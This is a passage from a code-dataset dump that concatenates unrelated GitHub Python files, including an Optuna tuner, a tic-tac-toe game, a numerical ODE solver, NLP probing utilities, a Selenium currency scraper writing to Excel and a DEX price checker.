noted as part of the ndarray insert, but are tracked via\n # filename for images. We could (a) prevent loading partial volumes or (b) add\n # fields/tables to track this information. I previously included a Zoom table\n\n if isinstance(slice_key, str):\n slice_key = self._string_to_slice_key(slice_key)\n\n data = self.__getitem__(key=slice_key) if save_images or save_ndarray else None\n\n if (\n save_images\n and not image_mode\n and ((1, 1), str(data.dtype)) not in _fromarray_typemap\n ):\n image_mode_options = set(i[0] for i in _fromarray_typemap.values())\n raise ValueError(\n \"Datatype is not supported for saving. Please select one of the \"\n + f\"following and pass it as `image_mode`: {image_mode_options}\\n\"\n + \"See also docs for PIL.Image.fromarray\"\n )\n\n self._import_resolution()\n\n if table == \"Volume\":\n self._import_volume(\n data=data if save_ndarray else None, skip_duplicates=skip_duplicates\n )\n elif table == \"Segmentation\":\n self._import_segmentation(\n data=data if save_ndarray else None, skip_duplicates=skip_duplicates\n )\n elif table == \"Connectome\":\n raise ValueError(\"BossDB API does not yet support fetching connectome.\")\n\n if save_images:\n self._download_slices(slice_key, data, extension, image_mode)\n","repo_name":"CBroz1/element-volume","sub_path":"element_volume/readers/bossdb.py","file_name":"bossdb.py","file_ext":"py","file_size_in_byte":8240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"26076106570","text":"import logging\nimport warnings\nfrom abc import ABCMeta, abstractclassmethod\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Optional\n\nimport neptune.new.integrations.optuna as optuna_utils\nimport optuna\nfrom hydra.utils import get_original_cwd\nfrom neptune.new import Run\nfrom omegaconf import DictConfig, OmegaConf\nfrom optuna.pruners import HyperbandPruner\nfrom optuna.samplers import BaseSampler, CmaEsSampler, RandomSampler, TPESampler\nfrom optuna.study import Study\nfrom optuna.trial import FrozenTrial\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass BaseTuner(metaclass=ABCMeta):\n def __init__(self, config: DictConfig, run: Optional[Run] = None):\n self.config = config\n self.run = run\n\n @abstractclassmethod\n def _objective(self, trial: FrozenTrial, config: DictConfig) -> float:\n \"\"\"\n Objective function\n Args:\n trial: trial object\n config: config object\n Returns:\n metric score\n \"\"\"\n raise NotImplementedError\n\n def build_study(self, verbose: bool = False) -> Study:\n \"\"\"\n Build study\n Args:\n study_name: study name\n Returns:\n study\n \"\"\"\n try:\n # define study\n neptune_callback = optuna_utils.NeptuneCallback(\n self.run,\n plots_update_freq=1,\n log_plot_slice=False,\n log_plot_contour=False,\n )\n study = optuna.create_study(\n study_name=self.config.search.study_name,\n direction=self.config.search.direction,\n sampler=create_sampler(\n mode=self.config.search.mode, seed=self.config.search.seed\n ),\n pruner=HyperbandPruner(\n min_resource=self.config.search.min_resource,\n max_resource=self.config.search.max_resource,\n reduction_factor=self.config.search.reduction_factor,\n ),\n )\n\n # define callbacks\n objective = partial(self._objective, config=self.config)\n\n # optimize\n study.optimize(\n objective,\n n_trials=self.config.search.n_trials,\n callbacks=[neptune_callback],\n )\n\n self.run.stop()\n\n except TypeError:\n # define study\n study = optuna.create_study(\n study_name=self.config.search.study_name,\n direction=self.config.search.direction,\n sampler=create_sampler(\n mode=self.config.search.mode, seed=self.config.search.seed\n ),\n pruner=HyperbandPruner(\n min_resource=self.config.search.min_resource,\n max_resource=self.config.search.max_resource,\n reduction_factor=self.config.search.reduction_factor,\n ),\n )\n\n # define callbacks\n objective = partial(self._objective, config=self.config)\n\n # optimize\n study.optimize(objective, n_trials=self.config.search.n_trials)\n\n if verbose:\n self.display_study(study)\n\n return study\n\n def save_hyperparameters(self, study: Study) -> None:\n \"\"\"\n Save best hyperparameters to yaml file\n Args:\n study: study best hyperparameter object.\n \"\"\"\n path = Path(get_original_cwd()) / self.config.search.path_name\n update_params = OmegaConf.load(path)\n\n update_params.model.params.update(study.best_trial.params)\n\n OmegaConf.save(update_params, path)\n\n @staticmethod\n def display_study(study: Study) -> None:\n \"\"\"\n Display best metric score and hyperparameters\n Args:\n study: study best hyperparameter object.\n \"\"\"\n logging.info(\"Best trial:\")\n trial = study.best_trial\n logging.info(f\" Value: {trial.value}\")\n logging.info(\" Params: \")\n for key, value in trial.params.items():\n logging.info(f\" '{key}': {value},\")\n\n\ndef create_sampler(mode: str, seed: int) -> BaseSampler:\n \"\"\"\n Create sampler\n Args:\n sampler_mode: sampler mode\n seed: seed\n Returns:\n BaseSampler: sampler\n \"\"\"\n if mode == \"random\":\n sampler = RandomSampler(seed=seed)\n elif mode == \"tpe\":\n sampler = TPESampler(seed=seed)\n elif mode == \"cma\":\n sampler = CmaEsSampler(seed=seed)\n else:\n raise ValueError(f\"Unknown sampler mode: {mode}\")\n\n return sampler\n","repo_name":"ds-wook/predict-meals","sub_path":"src/tuning/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"91"}
+{"seq_id":"11389909074","text":"# Tic Tac Toe game\n# Make for the practicepython.org website Exercise 29\n\n\n# This function does the checking to see if a List of 3 items in the board is a winner or not\ndef checking_(array):\n\n\tif all(x == \"X\" for x in array):\n\t\t# 1 is player 1 is the winner\n\t\treturn 1\n\telif all(o == \"O\" for o in array):\n\t\t# 2 is player 2 is the winner\n\t\treturn 2\n\telse:\n\t\t# No winner\n\t\treturn 0\n\n# This will break and board into various parts for the analyze function to check.\ndef board_analyze(board_state):\n\twinner = 0\n\t# This will send horizontal parts to be check\n\tfor val in range(3):\n\t\twinner = checking_(board_state[val])\n\t\tif winner == 1 or winner == 2:\n\t\t\treturn winner\n\n\t# This will send the vertical parts to be check\n\tfor x in range(3):\n\t\tvertical_holder = []\n\t\tfor y in range(3):\n\t\t\tvertical_holder.append(board_state[y][x])\n\t\twinner = checking_(vertical_holder)\n\t\tif winner == 1 or winner == 2:\n\t\t\treturn winner\n\t\n\t# This checks the two horizontals\n\tdiagonal1 = checking_([board_state[1][1], board_state[0][0], board_state[2][2]])\n\tdiagonal2 = checking_([board_state[1][1], board_state[0][2], board_state[2][0]])\n\n\tif diagonal1 != 0:\n\t\treturn diagonal1\n\telif diagonal2 != 0:\n\t\treturn diagonal2\n\n\t# Ultimate returns the winner 0 if nobody wins\n\treturn winner\n\n# This handles the moves and draw the boards for the player\ndef do_move(board_state, player_move, move_counter):\n\tsymbol = (\"X\" if move_counter % 2 == 1 else \"O\")\n\tmove = player_move.strip().split(\",\")\n\tboard = board_state\n\ttry: \n\t\tassert(board_state[int(move[0])][int(move[1])] == 0)\n\t\tboard_state[int(move[0])][int(move[1])] = symbol\n\texcept:\n\t\tprint(\"*************INVALID MOVE************\")\n\t\treturn board_state, move_counter\n\tmove_counter += 1\n\treturn board_state, move_counter\n\n# the internal data structureis [[0,0,0],[0,0,0],[0,0,0]]\n# Draws the board\ndef draw_game_box(internal_board_state_array):\n\tfor x in range(3):\n\t\tprint(\" ----- \"*3)\n\t\tfor y in range(3):\n\t\t\tprint(f\" | {'-' if internal_board_state_array[x][y] == 0 else internal_board_state_array[x][y]} |\", end=(\" \" if y < 2 else \"\\n\"))\n\t\tprint(\" ----- \"*3)\n\n# Main game\ndef tic_tac_toe():\n\ttotal_moves = 1\n\twinner = 0\n\t# Initial board state\n\tgame_board = [[0,0,0],[0,0,0],[0,0,0]]\n\n\tprint(\"Welcome to the Tic-Tac-Toe Game!\")\n\tplayer1_name = input(\"What is the first player name? >>>> \").strip()\n\tplayer2_name = input(\"What is the second player name? >>>> \").strip()\n\n\tprint(f\"\\n******* {player1_name} VS {player2_name} ******* \")\n\n\n\tdraw_game_box(game_board)\n\t# Runs infinitely until all valid moves are done.\n\twhile total_moves <= 9:\n\t\t# Moves must be inputed as >>>> 1,2 [row,col]\n\t\tmove = input(\"Where would you like to move? Please input the coordinates as >>>> row, col \")\n\t\tgame_board, total_moves = do_move(game_board, move, total_moves)\n\t\tdraw_game_box(game_board)\n\t\twinner = board_analyze(game_board)\n\t\tif winner == 1:\n\t\t\tprint(f\"***************Congratulations {player1_name} you won!!!********************\")\n\t\t\tbreak\n\t\tif winner == 2:\n\t\t\tprint(f\"***************Congratulations {player2_name} you won!!!********************\")\n\t\t\tbreak\n\n\tif winner == 0:\n\t\tprint(\"Nobody won!\")\n\t\texit()\n\nif __name__ == '__main__':\n\ttic_tac_toe()","repo_name":"dtdao/learning-python-django","sub_path":"exercise29.py","file_name":"exercise29.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34615554523","text":"import math\n\ndef f(x):\n return 3 * math.sin(2 * x)\n\ndef analytical(x):\n return (2 - 0.75 * x) * math.cos(2 * x) + 1.5 * math.sin(x) * math.cos(x)\n\nn = 10\np = 0.0\nq = 4.0\na = analytical(0)\nb = analytical(1)\nys = [[], []]\n\ndef getC1():\n return (b - ys[0][n]) / ys[1][n]\n\ndef getYi(i):\n return ys[0][i] + getC1() * ys[1][i]\n\nprint(\"МЕТОД СТРЕЛЬБЫ:\")\nprint(\"y'' + %0.1fy' + %0.1fy = (2 - 0.75*x)*cos(2x) + 1.5*sin(x)*cos(x)\" % (p, q))\nprint(\"y(0) = %f\" % a)\nprint(\"y(1) = %f\" % b)\nprint(\"Количество разбиений: %d\" % n)\nh = 1.0 / float(n)\nprint(h)\n\ndelta = h * 100\nxs = []\nfor i in range(n + 1):\n xs.append(float(i) * h)\nfor i in range(2):\n ys[i] = [a, a + delta]\nys[1] = [0, delta]\n\nfor i in range(1, n):\n ys[0].append((h * h * f(xs[i]) + (2.0 - q * h * h) * ys[0][i] - (1.0 - h / 2 * p) * ys[0][i - 1]) / (1 + h / 2 * p))\n ys[1].append(((2.0 - q * h * h) * ys[1][i] - (1.0 - h / 2 * p) * ys[1][i - 1]) / (1 + h / 2 * p))\n\ny = []\nfor i in range(n + 1):\n y.append(getYi(i))\nprint(len(y))\n\nmaxR = 0.0\n\nfor i in range(len(y)):\n print(\"x=%.1f, y=%.6f, y*=%.6f |y-y*|=%.6f\" % (float(i) * h, analytical(xs[i]), y[i], math.fabs(y[i] - analytical(xs[i]))))\n if math.fabs(y[i] - analytical(xs[i])) > maxR:\n maxR = math.fabs(y[i] - analytical(xs[i]))\n\nprint(\"||y-y*||=%.6f\" % maxR)","repo_name":"lozovska/NumericalMethods","sub_path":"4/streljba.py","file_name":"streljba.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40363963475","text":"'''\nBai 11-1\n@author: packkkk\n'''\n\n# Code goes here\nfrom bai11modules import read_report_file, read_file\n\ntry:\n filename = input('Input filename: ')\n content = read_file(filename)\n read_report_file(filename)\nexcept Exception as error:\n print('Error: ', error)\n ","repo_name":"ngcvm/python-fundamental","sub_path":"bai11/bai11-2.py","file_name":"bai11-2.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7047710911","text":"class Solution:\n def minOperations(self, nums: List[int], numsDivide: List[int]) -> int:\n nums.sort()\n \n d = numsDivide[0]\n \n for x in numsDivide:\n d = gcd(d, x)\n \n for i, x in enumerate(nums):\n if d % x == 0:\n return i\n \n return -1","repo_name":"hwennnn/leetcode-solutions","sub_path":"problems/minimum_deletions_to_make_array_divisible/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"39548032752","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 8 14:48:15 2022\n\n@author: Peter\n\"\"\"\n\nimport configparser\n\nimport dmd_control\nimport basis_generation\n\n\n\n#grabs the parameters for the program from config file 'config.ini'\ndef get_config_parameters():\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n basis_parameters = {\n \"basis_type\": config.get(\"pattern\", \"basis_type\"),\n \"basis_size\": config.getint(\"pattern\", \"basis_size\"),\n \"sensing_area\": config.getint(\"pattern\", \"sensing_area\"),\n \"top_left_x\": config.getint(\"pattern\", \"top_left_x\"),\n \"top_left_y\": config.getint(\"pattern\", \"top_left_y\"),\n }\n\n return (\n config.getint(\"compression\", \"compression_percent\"),\n basis_parameters,\n config.get(\"file handling\", \"basis_indices_filename\"),\n )\n\n\n#save the indices of the hadamard patterns to file\ndef write_basis_indices_to_file(filename, basis_indices):\n basis_index_file = open(filename, 'w')\n for index in basis_indices:\n basis_index_file.write(str(index)+'\\n')\n basis_index_file.close()\n \n \ndef main():\n\n percent_compression, basis_params, basis_indices_filename = get_config_parameters()\n\n #get basis patterns. default hadamard\n basis_patterns, basis_indices = basis_generation.generate_bases(\n basis_type=basis_params[\"basis_type\"], \n basis_size=basis_params[\"basis_size\"],\n percent_compression=percent_compression\n )\n \n write_basis_indices_to_file(basis_indices_filename, basis_indices)\n \n if basis_params[\"sensing_area\"] is not basis_params[\"basis_size\"]:\n basis_patterns = basis_generation.pp_enlarge_patterns(basis_patterns, basis_params[\"sensing_area\"])\n \n dmd_control.run_dmd(basis_patterns, (basis_params[\"top_left_x\"], basis_params[\"top_left_y\"]))\n\n \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Alexander2116/DMD---PSI","sub_path":"Archive/compressive_sensing.py","file_name":"compressive_sensing.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4572031371","text":"import copy\nclass Matrix:\n\n\tdef __init__(self, matrice):\n\t\tself.matrice = matrice\n\n\t@staticmethod\n\tdef print(A): \n\t\tfor j in A:\n\t\t\tfor i in j:\n\t\t\t\tprint(i, end=\" \")\n\t\t\tprint()\n\t\treturn ''\n\n\t@staticmethod\n\tdef getminor(mas,k): \n\t\tres=[]\n\t\tfor r in mas[1:]:\n\t\t\trow=[]\n\t\t\tfor j in range(len(r)):\n\t\t\t\tif j != k:\n\t\t\t\t\trow.append(r[j])\n\t\t\tres.append(row)\n\t\treturn res\n\n\t@staticmethod\n\tdef getdet(mas):\n\t\tn=len(mas)\n\t\tif n==2:\n\t\t\treturn mas[0][0]*mas[1][1]-mas[0][1]*mas[1][0]\n\t\tdet = 0\n\t\tsign = 1\n\t\tfor i in range(n):\n\t\t\tdet=det+sign*mas[0][i]*Matrix.getdet(Matrix.getminor(mas,i))\n\t\tsign=-sign\n\t\treturn det \n\n\tdef __gt__(self, other): \n\t\treturn (Matrix.getdet(self.matrice) > Matrix.getdet(other.matrice))\n\n\tdef __lt__(self, other):\n\t\treturn (Matrix.getdet(self.matrice) < Matrix.getdet(other.matrice))\n\n\tdef __eq__(self, other):\n\t\treturn (Matrix.getdet(self.matrice) == Matrix.getdet(other.matrice))\n\n\tdef __add__(self, other):\n\t\tA = copy.deepcopy(self.matrice)\n\t\tfor i in range(len(A)):\n\t\t\tfor i2 in range(len(other.matrice[i])):\n\t\t\t\tA[i][i2] = self.matrice[i][i2] + other.matrice[i][i2]\n\t\treturn Matrix.print(A)\n\n\tdef __mul__(self, other): \n\t\ts = 0\n\t\tA = copy.deepcopy(self.matrice)\n\t\tfor i in range(len(A)):\n\t\t\tfor i2 in range(len(other.matrice[i])):\n\t\t\t\tfor z in range(len(A[i2])):\n\t\t\t\t\ts = s + self.matrice[i][z] * other.matrice[z][i2]\n\t\t\t\t\tA[i][i2] = s\n\t\t\t\t\ts = 0\n\t\treturn Matrix.print(A)\n\nx1 = Matrix([[45,2],[1,8]])\nx2 = Matrix([[8,19],[22,69]])\nif x1 > x2:\n\tprint('x1 > x2')\n\nif x1 < x2:\n\tprint('x1 < x2')\n\nif x1 == x2:\n\tprint('x1 == x2')\n\nprint()\nprint('Сумма: ')\nprint(x1 + x2)\nprint('Произведение: ')\nprint(x1 * x2)\n","repo_name":"asdsa7/Laba3_VEB","sub_path":"laba3.py","file_name":"laba3.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41494810042","text":"# Custom imports\nfrom web3_stuff.apeSwap import run_ape\nfrom web3_stuff.gravity import run_gravity\nfrom web3_stuff.polycat import run_polycat\nfrom web3_stuff.quickSwap import run_quick\nfrom web3_stuff.sushiSwap import run_sushi\n\nfrom web3_stuff.global_constants import AVAILABLE_TOKENS\n\nALL_EXCHANGES = {\n \"APESWAP\": run_ape,\n \"GRAVITY\": run_gravity,\n \"POLYCAT\": run_polycat,\n \"QUICKSWAP\": run_quick,\n \"SUSHISWAP\": run_sushi,\n}\n\n# Function consuming a dicts of exchange names and a token name\n# calling the run function for each exchange given\n# returning a list of priceData dicts\ndef run_exchanges(data: dict[list[str], str]):\n exchanges: list = data[\"exchanges\"]\n token: str = data[\"token\"]\n\n token_addr = next(\n item for item in AVAILABLE_TOKENS if item[\"token_name\"] == token\n )\n\n exchange_prices = []\n for exchange in exchanges:\n func = ALL_EXCHANGES.get(exchange)\n exchange_data = func(token_addr[\"token_addr\"])\n\n exchange_prices.append(exchange_data)\n\n return exchange_prices\n","repo_name":"Danglebary/dex-price-checker-v1","sub_path":"backend-python/web3_stuff/price_discovery_machine.py","file_name":"price_discovery_machine.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13948502417","text":"#Importamos o selenium para trabalhar com as páginas da web\nfrom selenium import webdriver as opcoes_selenium_aula\nfrom selenium.webdriver.common.keys import Keys\n\n#Importando a biblioteca do pyautogui para trabalhar com o tempo e teclas do teclado\nimport pyautogui as tempoPausaComputador\n\n#Usuando o pyautogui para controlar o teclado\nimport pyautogui as teclasAtalhoTeclado\n\n#Usando o By para trabalhar com as atualizações mais recentes\nfrom selenium.webdriver.common.by import By\n\n#Passamos autorização ao acesso as configurações do Chrome\nmeuNavegador = opcoes_selenium_aula.Chrome()\nmeuNavegador.get('https://www.google.com.br/')\n\ntempoPausaComputador.sleep(4)\n\n#Procurando pelo elemento NAME e quando encontrar vou escrever Dolar hoje\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(\"Dolar hoje\")\n\ntempoPausaComputador.sleep(4)\n\n#Retorna para o campo name q\n#Faz a busca do valor que está digitado no campo NAME q\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(Keys.RETURN)\n\ntempoPausaComputador.sleep(4)\n\n\nvalorDolarPeloGoogle = meuNavegador.find_elements(By.XPATH, '//*[@id=\"knowledge-currency__updatable-data-column\"]/div[1]/div[2]/span[1]')[0].text\n\ntempoPausaComputador.sleep(4)\n\nprint(valorDolarPeloGoogle)\n\n#-----------------------------------------------------------------------------------------------------\n\ntempoPausaComputador.sleep(2)\n\n#Retorna para o campo name q\n#Faz a busca do valor que está digitado no campo NAME q\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(\"\")\n\ntempoPausaComputador.sleep(4)\n\n#Estamos usando o pyautogui para apertar a tecla TAB\nteclasAtalhoTeclado.press('tab')\n\ntempoPausaComputador.sleep(4)\n\n#Estamos usando o pyautogui para apertar a tecla enter\n#Enter para limpar o campo de pesquisa\nteclasAtalhoTeclado.press('enter')\n\ntempoPausaComputador.sleep(4)\n\n#Procurando pelo elemento NAME e quando encontrar vou escrever Dolar hoje\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(\"Euro hoje\")\n\ntempoPausaComputador.sleep(4)\n\n#Retorna para o campo name q\n#Faz a busca do valor que está digitado no campo NAME q\nmeuNavegador.find_element(By.NAME, \"q\").send_keys(Keys.RETURN)\n\ntempoPausaComputador.sleep(4)\n\n\nvalorEuroPeloGoogle = meuNavegador.find_elements(By.XPATH, '//*[@id=\"knowledge-currency__updatable-data-column\"]/div[1]/div[2]/span[1]')[0].text\n\ntempoPausaComputador.sleep(4)\n\nprint(valorEuroPeloGoogle)\n\n#----------------------------------------------------------------------------------------------------------------------------------\n\nimport xlsxwriter \nimport os\n\nnomeCaminhoArquivo = \"C:\\\\Users\\\\Pedro W\\\\Desktop\\\\PYTHON_GERAL\\\\PythonRPA\\\\Extraindo Valor do Dolar e Euro e Salvando no Excel\\\\Imprime Dolar e Euro Google.xlsx\"\nplanilhaCriada = xlsxwriter.Workbook(nomeCaminhoArquivo)\nsheet1 = planilhaCriada.add_worksheet()\n\n#Escervendo nas células\nsheet1.write(\"A1\", \"Dolar\")\nsheet1.write(\"B1\", \"Euro\")\nsheet1.write(\"A2\", valorDolarPeloGoogle)\nsheet1.write(\"B2\", valorEuroPeloGoogle)\n\n#Substituir a vírgula por ponto \nvalorDolarPeloGoogle = valorDolarPeloGoogle.replace(',','.')\nvalorEuroPeloGoogle = valorEuroPeloGoogle.replace(',','.')\n\n#Convertendo o valor do Dolar e do Euro de Sting para Float\nvalor_Dolar_Tipo_Float = float(valorDolarPeloGoogle)\nvalor_Euro_Tipo_Float = float(valorEuroPeloGoogle)\n\nsheet1.write(\"A3\", valor_Dolar_Tipo_Float)\nsheet1.write(\"B3\", valor_Euro_Tipo_Float)\n\n#Fechando o arquivo do Excel que está em segundo plano\nplanilhaCriada.close()\n\n#Abro o arquivo\nos.startfile(nomeCaminhoArquivo)\n\n","repo_name":"PedroWilkinson/Python_RPA","sub_path":"Extrair_Euro_Dolar_Excel.py","file_name":"Extrair_Euro_Dolar_Excel.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"594508509","text":"import pickle \n\nimport torch\nimport os\nfrom torch import Tensor \nfrom typing import List \nfrom lstm.model import RNNModel \nfrom conllu import parse_incr, TokenList\nfrom tqdm import tqdm\nimport numpy as np \n\npos_w2i = dict()\npos_i2w = dict()\nlast = 0\n\nfrom lstm.model import RNNModel\n\n# READ DATA\n# If stuff like `: str` and `-> ..` seems scary, fear not! \n# These are type hints that help you to understand what kind of argument and output is expected.\ndef parse_corpus(filename: str) -> List[TokenList]:\n \"\"\"Parses a conllu file into a List of TokenLists\"\"\"\n data_file = open(filename, encoding=\"utf-8\")\n\n ud_parses = list(parse_incr(data_file))\n return ud_parses\n\ndef fetch_sen_reps(ud_parses: List[TokenList], model, tokenizer, concat=True, get_pos = False, shuffled=False) -> List[Tensor]:\n \"\"\"\n Returns a list of length len(ud_parses), or a tensor of total_word_len * repr_size.\n \"\"\"\n if get_pos:\n global last, pos_w2i, pos_i2w\n pos_result = []\n \n model.eval()\n model.cuda()\n doing_lstm = type(model) == RNNModel\n sentences_result = []\n global_words = []\n for sentence_nr, sentence in tqdm(enumerate(ud_parses)):\n sentence_words = []\n if shuffled:\n random_indices = np.arange(len(sentence))\n np.random.shuffle(random_indices )\n #print(random_indices)\n\n # First build string sentence repr with spaces and such\n for i, real_token in enumerate(sentence):\n token = real_token if not shuffled else sentence[random_indices[i]]\n if get_pos:\n postag = token['upostag']\n if postag in pos_w2i:\n posindex = pos_w2i[postag]\n else:\n posindex = last\n pos_w2i[postag] = last \n pos_i2w[last] = postag \n last += 1\n pos_result.append(posindex)\n \n if token['misc'] is not None:\n # SpaceAfter = False\n next_word = token['form']\n else:\n # SpaceAfter = True\n next_word = token['form'] + ' '\n sentence_words.append(next_word)\n # Now build model representation!\n \n #print(sentence_words)\n\n # Also add to global_words to retain word representations\n global_words.append(sentence_words)\n \n # In case of LSTM\n if doing_lstm:\n the_input = torch.tensor([tokenizer[z.strip()] for z in sentence_words]).unsqueeze(0)\n with torch.no_grad():\n final = model(the_input, model.init_hidden(1))\n final = final.squeeze(0)\n assert len(final) == len(sentence_words), \"Something is wrong..\"\n sentences_result.append(final)\n \n # In case of Transformer\n else:\n representation = []\n sizes = [] \n for i,word in enumerate(sentence_words):\n if i>0 and sentence_words[i-1][-1] == ' ':\n e = tokenizer.encode(' ' + word.strip())\n representation += e\n sizes.append(len(e))\n else:\n e = tokenizer.encode(word.strip())\n representation += e\n sizes.append(len(e))\n the_input = torch.tensor(representation).cuda()\n with torch.no_grad():\n the_input = the_input.unsqueeze(0)\n result = model(the_input)[0]\n result = result.squeeze(0)\n final_repr = []\n \n i = 0\n for size in sizes:\n to_append = torch.mean(result[i:i+size], dim=0)\n final_repr.append(to_append)\n i += size\n \n assert len(final_repr) == len(sentence_words), \"Something is wrong\"\n sentences_result.append(torch.stack(final_repr).squeeze(1))\n print(\"WTH\")\n if concat:\n #for s in sentences_result:\n yes = torch.cat([s for s in sentences_result], dim=0)\n if get_pos: return yes, torch.tensor(pos_result), global_words\n return yes\n \n # Assume concat means structural probe, means no pos\n return [s for s in sentences_result] #, global_words\n\n\n# I provide the following sanity check, that compares your representations against a pickled version of mine.\n# Note that I use the DistilGPT-2 LM here. For the LSTM I used 0-valued initial states.\ndef assert_sen_reps(transformer, tokenizer, lstm, vocab):\n with open('distilgpt2_emb1.pickle', 'rb') as f:\n distilgpt2_emb1 = pickle.load(f)\n\n with open('lstm_emb1.pickle', 'rb') as f:\n lstm_emb1 = pickle.load(f)\n \n corpus = parse_corpus('data/sample/en_ewt-ud-train.conllu')[:1]\n\n own_distilgpt2_emb1 = fetch_sen_reps(corpus, transformer, tokenizer)\n own_lstm_emb1 = fetch_sen_reps(corpus, lstm, vocab)\n print(distilgpt2_emb1.shape, own_distilgpt2_emb1.shape)\n \n assert distilgpt2_emb1.shape == own_distilgpt2_emb1.shape\n assert lstm_emb1.shape == own_lstm_emb1.shape\n assert torch.allclose(distilgpt2_emb1, own_distilgpt2_emb1,atol=1e-05), \"GPT2 embeddings don't match!\"\n assert torch.allclose(lstm_emb1, own_lstm_emb1,atol=1e-05), \"LSTM embeddings don't match!\"\n\n print(\"All is well!\")\n\ndef create_data(filename: str, lm, w2i, pos_vocab=None, cutoff=None, shuffled=False):\n \"\"\"Create whole dataset \"\"\"\n global pos_w2i\n ud_parses = parse_corpus(filename)[:cutoff]\n print(\"Creating data for\", len(ud_parses))\n sen_reps, pos_tags, global_words = fetch_sen_reps(ud_parses, lm, w2i, concat=True, get_pos=True, shuffled=shuffled)\n print(\"Done sen reps\")\n pos_vocab = pos_w2i\n\n return sen_reps, pos_tags, pos_vocab, global_words\n\ndef create_or_load_pos_data(set_type:str, lm, w2i, pos_vocab=None, cutoff=None, extra_transformer = None, shuffled=False):\n \"\"\"\n Args:\n set_type: (train,dev,test)\n lm: language model to use\n w2i: corresponding tokenizer/dictionary\n pos_vocab: existing pos_vocab object, set to None for the very first set you load\n Returns:\n x,y: Tensors of size pos_length*repr_size and pos_length\n vocab: vocab to use for the next iteration if first time saving, None otherwise\n words: all words to use for control task\n \"\"\"\n # Remember original set type, may be overwritten with additional transformer information\n original_set_type = set_type\n model_name = 'RNN' if type(lm) == RNNModel or extra_transformer=='RNN' else 'transformer'\n if extra_transformer == 'BART':\n #model_name += 'BART'\n set_type += '_BART'\n if extra_transformer == 'XLNet':\n #model_name += 'XLNet'\n set_type += '_XLNet'\n if extra_transformer == 'T5':\n #model_name += 'T5'\n set_type += 'TransformerXL'\n if extra_transformer == 'TransformerXL':\n #model_name += 'T5'\n set_type += '_TransformerXL'\n\n if shuffled:\n set_type += \"_shuffled\"\n save_filename = os.path.join('corpus', model_name + '_pos'+set_type+'.pickle')\n words_filename = os.path.join('words', set_type+'.pickle')\n print(\"USING SAVE\", save_filename)\n if os.path.exists(save_filename):\n with open(save_filename, \"rb\") as f: \n l = pickle.load(f)\n #with open(words_filename, \"rb\") as f:\n # words = pickle.load(f)\n return l['x'], l['y'], None, None #words\n\n # If not exists\n set_type = original_set_type\n x,y,vocab,words = create_data(\n os.path.join('data', 'en_ewt-ud-'+set_type+'.conllu'),\n lm, \n w2i,\n pos_vocab,\n cutoff, \n shuffled\n )\n\n print(\"Data created. Pickling now\")\n\n # Pickle corpus and true y-labels\n if not os.path.exists(\"corpus\"):\n os.makedirs(\"corpus\")\n with open(save_filename, \"wb\") as f:\n pickle.dump({\"x\":x, \"y\":y}, f)\n\n # Pickle words for control task\n if not os.path.exists(\"words\"):\n os.makedirs(\"words\") \n with open(words_filename,\"wb\") as fp: \n pickle.dump(words, fp)\n\n return x,y,vocab,words","repo_name":"annaproxy/nlp2-probing-lms","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"}
+{"seq_id":"2935594157","text":"import random\nimport sys\n\nimport pygame\n\nfrom src import colors\nfrom src.utils import cur_time\nfrom src.algorithms import IAutomatonAlgorithm\n\n\nclass AliveCell:\n def __init__(self, x, y, color):\n self.x = x\n self.y = y\n self.color = color\n\n @property\n def key(self):\n return self.x, self.y\n\n def __repr__(self):\n return f'AliveCell({self.x}, {self.y})'\n\n def __str__(self):\n return f'AliveCell({self.x}, {self.y})'\n\n\nclass Automaton:\n _screen = None\n _next_fps_tick = 0\n _automaton_algorithm = None\n _algorithm_started = False\n\n def __init__(self, screen_size=None, cell_count=100, max_fps=60):\n self._screen_size = screen_size or [1280, 720]\n self._screen_ratio = self._screen_size[0] / self._screen_size[1]\n self._max_fps = max_fps\n self._fps_cooldown = 1 / max_fps * 1000\n\n self._cell_count = cell_count\n self._cell_limits = self._calculate_dimension_limits()\n self._cell_sizes = self._calculate_cell_sizes()\n self._map = {}\n\n def _calculate_cell_sizes(self):\n width = int(self._screen_size[0] / self._cell_limits[0])\n height = int(self._screen_size[1] / self._cell_limits[1])\n return max(width, 1), max(height, 1)\n\n def _calculate_dimension_limits(self):\n \"\"\"\n y*ratio + height = cell_count ---> y = cell_count / (ratio + 1)\n \"\"\"\n y_cells_count = int(self._cell_count / (self._screen_ratio + 1))\n x_cells_count = self._cell_count - y_cells_count\n return x_cells_count, y_cells_count\n\n def 